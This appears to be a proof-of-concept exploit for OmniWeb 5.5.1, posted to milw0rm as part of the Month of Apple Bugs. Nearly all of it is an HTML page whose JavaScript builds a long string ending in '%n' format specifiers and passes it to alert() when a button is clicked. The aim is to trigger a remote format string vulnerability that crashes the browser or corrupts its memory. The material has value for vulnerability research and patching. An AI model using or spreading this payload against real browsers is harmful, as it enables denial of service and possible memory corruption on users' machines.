OmniWeb 5.5.1 Javascript alert() Remote Format String PoC



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"

    "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
    <head>
        <title>MOAB-07-01-2007</title>
        <script>
            /* LMH */
            function boom() {
                var str = 'A';
                while (str.length <= 32) str+=str;
                str = str + '%n%n%n%n%n%n';
                alert(str);
            }
        </script>
    </head>
    <body>
        <input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
    </body>

</html>

# milw0rm.com [2007-01-07]